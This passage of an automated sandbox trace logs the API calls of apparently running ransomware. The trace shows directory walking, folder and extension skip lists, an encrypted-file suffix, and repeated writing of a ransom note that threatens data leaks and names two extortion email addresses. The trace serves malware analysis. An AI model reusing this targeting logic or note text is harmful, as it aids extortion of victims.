lpMem=0xebcae0 | out: hHeap=0xea0000) returned 1 [0141.070] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee8d8 | out: hHeap=0xea0000) returned 1 [0141.070] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2a88 [0141.071] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef1158 [0141.071] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedab30 | out: hHeap=0xea0000) returned 1 [0141.071] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcbbb880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcbbb880, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcbbb880, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", cAlternateFileName="{F8CFE~1.210")) returned 0 [0141.071] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc8e8 | out: hHeap=0xea0000) returned 1 [0141.071] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6d58 | out: hHeap=0xea0000) returned 1 [0141.071] FindClose (in: hFindFile=0xecfbe0 | out: hFindFile=0xecfbe0) returned 1 [0141.071] Sleep (dwMilliseconds=0x32) [0141.142] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc48 | out: hHeap=0xea0000) returned 1 [0141.142] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc90 | out: hHeap=0xea0000) returned 1 [0141.142] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f90 [0141.142] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4188 [0141.143] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4070 [0141.143] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4188 | out: hHeap=0xea0000) returned 1 [0141.143] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4188 [0141.143] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2600 [0141.143] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4000 [0141.143] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4038 [0141.143] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x46) returned 0xec1d30 [0141.143] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4038 | out: hHeap=0xea0000) returned 1 [0141.143] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4000 | out: hHeap=0xea0000) returned 1 [0141.143] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef2600 | out: hHeap=0xea0000) returned 1 [0141.143] CreateFileW (lpFileName="C:\\ProgramData\\Sun\\R3ADM3.txt" (normalized: "c:\\programdata\\sun\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0141.146] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0141.146] WriteFile (in: hFile=0x210, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0141.147] CloseHandle (hObject=0x210) returned 1 [0141.147] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec1d30 | out: hHeap=0xea0000) returned 1 [0141.147] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4188 | out: hHeap=0xea0000) returned 1 [0141.147] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Sun\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x5949f630, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5949f630, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfbe0 [0141.148] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0141.148] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x5949f630, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5949f630, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0141.148] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0141.148] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0141.148] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Java", cAlternateFileName="")) returned 1 [0141.148] lstrcmpW (lpString1="Java", lpString2=".") returned 1 [0141.148] lstrcmpW (lpString1="Java", lpString2="..") returned 1 [0141.148] StrStrIW (lpFirst="Java", lpSrch="tmp") returned 0x0 [0141.148] StrStrIW (lpFirst="Java", lpSrch="winnt") returned 0x0 [0141.148] StrStrIW (lpFirst="Java", lpSrch="temp") returned 0x0 [0141.148] StrStrIW (lpFirst="Java", lpSrch="thumb") returned 0x0 [0141.148] StrStrIW (lpFirst="Java", lpSrch="$Recycle.Bin") returned 0x0 [0141.149] StrStrIW (lpFirst="Java", lpSrch="$RECYCLE.BIN") returned 0x0 [0141.149] StrStrIW (lpFirst="Java", lpSrch="System Volume Information") returned 0x0 [0141.149] StrStrIW (lpFirst="Java", lpSrch="Boot") returned 0x0 [0141.149] StrStrIW (lpFirst="Java", lpSrch="Windows") returned 0x0 [0141.149] StrStrIW (lpFirst="Java", lpSrch="Trend Micro") returned 0x0 [0141.149] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4188 [0141.149] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4000 [0141.149] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4188 | out: hHeap=0xea0000) returned 1 [0141.149] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2600 [0141.149] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4188 [0141.149] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4000 | out: hHeap=0xea0000) returned 1 [0141.149] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5949f630, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x5949f630, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5949f630, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0141.149] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0141.149] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0141.149] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0141.149] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0141.150] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0141.150] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0141.150] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0141.150] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0141.150] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0141.150] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5949f630, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x5949f630, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5949f630, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 0 [0141.150] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee40a8 | out: hHeap=0xea0000) returned 1 [0141.150] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6970 | out: hHeap=0xea0000) returned 1 [0141.150] FindClose (in: hFindFile=0xecfbe0 | out: hFindFile=0xecfbe0) returned 1 [0141.150] Sleep (dwMilliseconds=0x32) [0141.224] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4070 | out: hHeap=0xea0000) returned 1 [0141.224] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f90 | out: hHeap=0xea0000) returned 1 [0141.224] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeee78 [0141.224] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeef68 [0141.224] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeeef0 [0141.224] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeef68 | out: hHeap=0xea0000) returned 1 [0141.224] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeef68 [0141.224] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef25d8 [0141.224] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeee00 [0141.224] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee8d8 [0141.224] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xedab30 [0141.224] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee8d8 | out: hHeap=0xea0000) returned 1 [0141.224] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeee00 | out: hHeap=0xea0000) returned 1 [0141.225] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef25d8 | out: hHeap=0xea0000) returned 1 [0141.225] CreateFileW (lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\R3ADM3.txt" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6cc [0141.225] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0141.225] WriteFile (in: hFile=0x6cc, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0141.226] CloseHandle (hObject=0x6cc) returned 1 [0141.226] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedab30 | out: hHeap=0xea0000) returned 1 [0141.226] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeef68 | out: hHeap=0xea0000) returned 1 [0141.226] FindFirstFileW (in: lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5955dd10, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5955dd10, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfbe0 [0141.227] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0141.227] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5955dd10, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5955dd10, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0141.227] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0141.227] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0141.227] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x27c2fae0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x4185decd, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x306000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="boot.sdi", cAlternateFileName="")) returned 1 [0141.227] lstrcmpW (lpString1="boot.sdi", lpString2=".") returned 1 [0141.227] lstrcmpW (lpString1="boot.sdi", lpString2="..") returned 1 [0141.227] StrStrIW (lpFirst="boot.sdi", lpSrch=".UAKXC") returned 0x0 [0141.227] StrStrIW (lpFirst="boot.sdi", lpSrch=".exe") returned 0x0 [0141.227] StrStrIW (lpFirst="boot.sdi", lpSrch=".dll") returned 0x0 [0141.227] StrStrIW (lpFirst="boot.sdi", lpSrch=".lnk") returned 0x0 [0141.227] StrStrIW (lpFirst="boot.sdi", lpSrch=".sys") returned 0x0 [0141.227] StrStrIW (lpFirst="boot.sdi", lpSrch=".msi") returned 0x0 [0141.227] StrStrIW (lpFirst="boot.sdi", lpSrch="R3ADM3.txt") returned 0x0 [0141.227] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef25d8 [0141.227] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeef68 [0141.227] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeee00 [0141.227] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xedab30 [0141.227] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeee00 | out: hHeap=0xea0000) returned 1 [0141.227] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeef68 | out: hHeap=0xea0000) returned 1 [0141.227] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef25d8 | out: hHeap=0xea0000) returned 1 [0141.228] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xeddb20 [0141.228] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef25d8 [0141.228] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd900 [0141.228] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeddb20 | out: hHeap=0xea0000) returned 1 [0141.228] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedab30 | out: hHeap=0xea0000) returned 1 [0141.228] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5955dd10, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x5955dd10, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5955dd10, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0141.228] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0141.228] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0141.228] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0141.228] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0141.228] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0141.228] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0141.228] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0141.228] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0141.228] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0141.228] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x6496a3c6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x64b0e1b9, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfa6eb761, ftLastWriteTime.dwHighDateTime=0x1cb88d1, nFileSizeHigh=0x0, nFileSizeLow=0xa160012, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Winre.wim", cAlternateFileName="")) returned 1 [0141.228] lstrcmpW (lpString1="Winre.wim", lpString2=".") returned 1 [0141.228] lstrcmpW (lpString1="Winre.wim", lpString2="..") returned 1 [0141.228] StrStrIW (lpFirst="Winre.wim", lpSrch=".UAKXC") returned 0x0 [0141.228] StrStrIW (lpFirst="Winre.wim", lpSrch=".exe") returned 0x0 [0141.228] StrStrIW (lpFirst="Winre.wim", lpSrch=".dll") returned 0x0 [0141.228] StrStrIW (lpFirst="Winre.wim", lpSrch=".lnk") returned 0x0 [0141.228] StrStrIW (lpFirst="Winre.wim", lpSrch=".sys") returned 0x0 [0141.228] StrStrIW (lpFirst="Winre.wim", lpSrch=".msi") returned 0x0 [0141.228] StrStrIW (lpFirst="Winre.wim", lpSrch="R3ADM3.txt") returned 0x0 [0141.228] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2650 [0141.229] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeef68 [0141.229] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeee00 [0141.229] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xedab30 [0141.229] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeee00 | out: hHeap=0xea0000) returned 1 [0141.229] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeef68 | out: hHeap=0xea0000) returned 1 [0141.229] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef2650 | out: hHeap=0xea0000) returned 1 [0141.229] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xeddb20 [0141.229] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2650 [0141.229] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd7f0 [0141.229] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeddb20 | out: hHeap=0xea0000) returned 1 [0141.229] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedab30 | out: hHeap=0xea0000) returned 1 [0141.229] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x6496a3c6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x64b0e1b9, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfa6eb761, ftLastWriteTime.dwHighDateTime=0x1cb88d1, nFileSizeHigh=0x0, nFileSizeLow=0xa160012, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Winre.wim", cAlternateFileName="")) returned 0 [0141.229] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedaab8 | out: hHeap=0xea0000) returned 1 [0141.229] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee8508 | out: hHeap=0xea0000) returned 1 [0141.229] FindClose (in: hFindFile=0xecfbe0 | out: hFindFile=0xecfbe0) returned 1 [0141.229] Sleep (dwMilliseconds=0x32) [0141.318] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeeef0 | out: hHeap=0xea0000) returned 1 [0141.318] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeee78 | out: hHeap=0xea0000) returned 1 [0141.318] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc90 [0141.318] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc48 [0141.318] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc8e8 [0141.318] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc48 | out: hHeap=0xea0000) returned 1 [0141.318] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc48 [0141.318] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef26c8 [0141.318] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcae0 [0141.318] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1650 [0141.318] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec3c0 [0141.318] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1650 | out: hHeap=0xea0000) returned 1 [0141.318] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcae0 | out: hHeap=0xea0000) returned 1 [0141.318] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef26c8 | out: hHeap=0xea0000) returned 1 [0141.318] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\R3ADM3.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6cc [0141.319] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0141.319] WriteFile (in: hFile=0x6cc, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0141.320] CloseHandle (hObject=0x6cc) returned 1 [0141.320] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec3c0 | out: hHeap=0xea0000) returned 1 [0141.320] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc48 | out: hHeap=0xea0000) returned 1 [0141.320] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x59642550, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x59642550, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfbe0 [0141.321] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0141.321] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x59642550, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x59642550, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0141.321] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0141.321] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0141.321] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0141.321] lstrcmpW (lpString1="AppData", lpString2=".") returned 1 [0141.321] lstrcmpW (lpString1="AppData", lpString2="..") returned 1 [0141.321] StrStrIW (lpFirst="AppData", lpSrch="tmp") returned 0x0 [0141.321] StrStrIW (lpFirst="AppData", lpSrch="winnt") returned 0x0 [0141.321] StrStrIW (lpFirst="AppData", lpSrch="temp") returned 0x0 [0141.321] StrStrIW (lpFirst="AppData", lpSrch="thumb") returned 0x0 [0141.321] StrStrIW (lpFirst="AppData", lpSrch="$Recycle.Bin") returned 0x0 [0141.321] StrStrIW (lpFirst="AppData", lpSrch="$RECYCLE.BIN") returned 0x0 [0141.321] StrStrIW (lpFirst="AppData", lpSrch="System Volume Information") returned 0x0 [0141.321] StrStrIW (lpFirst="AppData", lpSrch="Boot") returned 0x0 [0141.321] StrStrIW (lpFirst="AppData", lpSrch="Windows") returned 0x0 [0141.321] StrStrIW (lpFirst="AppData", lpSrch="Trend Micro") returned 0x0 [0141.321] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc48 [0141.321] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcae0 [0141.321] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x5e) returned 0xeec3c0 [0141.321] HeapFree (in: 